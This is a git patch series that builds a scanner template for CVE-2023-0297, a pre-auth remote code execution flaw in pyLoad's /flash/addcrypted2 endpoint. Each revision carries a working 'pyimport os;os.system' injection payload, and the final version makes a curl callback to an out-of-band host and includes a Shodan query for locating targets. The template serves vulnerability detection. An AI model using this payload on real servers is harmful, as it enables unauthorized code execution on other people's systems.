From ac84955ae66672aec9570e488933181bccbdaf9e Mon Sep 17 00:00:00 2001 From: "alert('0-0')" <49817411+MrHarshvardhan@users.noreply.github.com> Date: Tue, 4 Jul 2023 18:21:35 +0530 Subject: [PATCH 1/5] CVE-2023-0297.yaml --- http/cves/2023/CVE-2023-0297.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 http/cves/2023/CVE-2023-0297.yaml diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml new file mode 100644 index 00000000000..6618e77f1c8 --- /dev/null +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -0,0 +1,21 @@ +id: flash-addcrypted2-rce +info: + name: Flash Addcrypted2 Remote Code Execution + author: MrHarshvardhan + severity: high + description: | + Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability. + reference: + - https://www.exploit-db.com/exploits/51532 +requests: + - method: GET + path: + - /flash/addcrypted2 + attacks: + - raw: + - 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' + - 'CMD_PLACEHOLDER: "{cmd}"' + predicates: + - type: status + status: + - 200 From 276497b314108b9536645b38353f01f6d8e2ee63 Mon Sep 17 00:00:00 2001 From: "alert('0-0')" <49817411+MrHarshvardhan@users.noreply.github.com> Date: Tue, 4 Jul 2023 18:28:32 +0530 Subject: [PATCH 2/5] CVE-2023-0297.yaml --- http/cves/2023/CVE-2023-0297.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 6618e77f1c8..7650a9483d5 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -1,20 +1,20 @@ -id: flash-addcrypted2-rce +id: python-code-injection info: - name: Flash Addcrypted2 Remote Code Execution + name: Python Code Injection author: MrHarshvardhan - severity: high + severity: medium description: | - Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability. - reference: - - https://www.exploit-db.com/exploits/51532 + Template to detect Python code injection vulnerabilities. + reference: xxx requests: - method: GET path: - /flash/addcrypted2 attacks: - raw: - - 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' - - 'CMD_PLACEHOLDER: "{cmd}"' + headers: + Content-type: application/x-www-form-urlencoded + body: jk=pyimport%20os;os.system("{{cmd}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa predicates: - type: status status: From def35f6b48f3b2b0d0d370886594bf5253276c6f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 16:00:31 +0530 Subject: [PATCH 3/5] re-wrote template --- http/cves/2023/CVE-2023-0297.yaml | 69 ++++++++++++++++++++++--------- 1 file changed, 49 insertions(+), 20 deletions(-) diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 7650a9483d5..0a5381e5f88 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -1,21 +1,50 @@ -id: python-code-injection -info: - name: Python Code Injection - author: MrHarshvardhan - severity: medium +id: CVE-2023-0297 + +info: + name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) + author: MrHarshvardhan,DhiyaneshDk + severity: critical description: | - Template to detect Python code injection vulnerabilities. - reference: xxx -requests: - - method: GET - path: - - /flash/addcrypted2 - attacks: - - raw: - headers: - Content-type: application/x-www-form-urlencoded - body: jk=pyimport%20os;os.system("{{cmd}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa - predicates: - - type: status - status: - - 200 + Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + reference: + - https://www.exploit-db.com/exploits/51532 + - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1058 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0297 + cwe-id: CWE-94 + cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + shodan-query: html:"pyload" + tags: huntr,cve,cve2023,rce,pyload,oast + +variables: + cmd: "curl {{interactsh-url}}" + +http: + - raw: + - | + GET /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + + - | + POST /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - 'JDownloader' + + - type: word + part: interactsh_protocol + words: + - "dns" From 03b1f956c861b50426e05b7274374b48b6c2df8a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 16:04:40 +0530 Subject: [PATCH 4/5] trail space fix --- http/cves/2023/CVE-2023-0297.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 0a5381e5f88..1479bbda503 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -1,6 +1,6 @@ id: CVE-2023-0297 -info: +info: name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) author: MrHarshvardhan,DhiyaneshDk severity: critical From 0a0525fa67306b803d440eeeac320a528e39862b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 10:38:10 +0530 Subject: [PATCH 5/5] Update CVE-2023-0297.yaml --- http/cves/2023/CVE-2023-0297.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 1479bbda503..9560e9884ab 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -18,6 +18,7 @@ info: cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: max-request: 2 + verified: true shodan-query: html:"pyload" tags: huntr,cve,cve2023,rce,pyload,oast